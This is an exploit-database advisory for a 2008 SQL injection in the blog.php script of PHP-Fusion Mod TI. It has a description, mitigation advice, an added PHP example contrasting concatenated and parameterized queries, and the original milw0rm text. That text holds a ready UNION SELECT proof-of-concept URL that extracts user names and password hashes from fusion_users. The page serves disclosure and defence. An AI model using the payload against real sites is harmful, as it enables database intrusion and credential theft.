Vendor: PHP-Fusion Mod TI
By: Sina Yazdanmehr (R3d.W0rm)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PHP-Fusion Mod TI
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-Fusion Mod TI – Blog System SQL Injection

A SQL injection vulnerability exists in the blog system of PHP-Fusion Mod TI. The vulnerability is due to insufficient sanitization of user-supplied input in the 'blog_id' parameter of the 'blog.php' script. An attacker can exploit it by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script, which gives the attacker access to the database and the ability to execute arbitrary SQL commands.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
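
The mitigation above as an added example (not code from PHP-Fusion Mod TI or from the advisory): a concatenated lookup beside a validated, parameterized one, both run against the request value shown in the raw data below. It assumes PDO with an in-memory SQLite database in place of MySQL; the fusion_blog table, its columns, and the functions blog_unsafe and blog_safe are hypothetical.

```php
<?php
// Added example, not PHP-Fusion Mod TI code. In-memory SQLite stands in for MySQL;
// the fusion_blog table and its six columns are assumptions for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE fusion_users (user_name TEXT, user_password TEXT)");
$db->exec("CREATE TABLE fusion_blog (blog_id INTEGER, c1, c2, title TEXT, body TEXT, c5)");
$db->exec("INSERT INTO fusion_users VALUES ('admin', 'constructed-hash')");
$db->exec("INSERT INTO fusion_blog VALUES (1, 0, 0, 'Hello', 'First post', 0)");

// Vulnerable pattern (hypothetical): the request value becomes part of the SQL text.
function blog_unsafe(PDO $db, string $id): array
{
    $sql = "SELECT * FROM fusion_blog WHERE blog_id='" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: validate the id as a positive integer, then bind it as a parameter.
function blog_safe(PDO $db, string $id): array
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return []; // not a valid id: no query is built at all
    }
    $stmt = $db->prepare("SELECT * FROM fusion_blog WHERE blog_id = :id");
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// The id value from the advisory's request, URL-decoded.
$payload = "-9999' union select 0,1,2,user_name,user_password,5 from fusion_users/*";

foreach (['blog_unsafe', 'blog_safe'] as $fn) {
    printf("%s(payload): %s\n", $fn, json_encode($fn($db, $payload)));
    printf("%s('1'):     %s\n", $fn, json_encode($fn($db, '1')));
}
```

Validation and binding are independent layers: the integer check rejects the value before any SQL exists, and the bound parameter keeps the query structure fixed even if a validation rule is later loosened.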

Exploit-DB raw data:

#####################################################################################
####              	PHP-Fusion Mod TI - Blog System Sql Injection                ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
#                                                                                   #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=157
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-12-28]